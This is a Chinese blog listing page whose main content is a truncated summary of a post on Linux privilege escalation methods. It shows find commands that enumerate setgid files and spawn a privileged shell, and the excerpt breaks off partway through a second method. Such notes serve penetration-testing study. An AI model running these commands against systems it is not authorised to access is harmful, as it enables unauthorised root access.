会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Loading
土豆分米猪
生活不息,学习不止。
博客园
首页
新随笔
联系
订阅
管理
2022年2月17日
Linux提权方法小结
摘要: 1 find 命令提权 1.1 方法一 find / -perm -g=s -type f 2>/dev/null find . -exec /bin/sh -p \;-quit 1.2 方法二 touch getshell find / -type f -name getshell -exec "
阅读全文
posted @ 2022-02-17 10:48 土豆分米猪
阅读(940)
评论(0)
推荐(0)
公告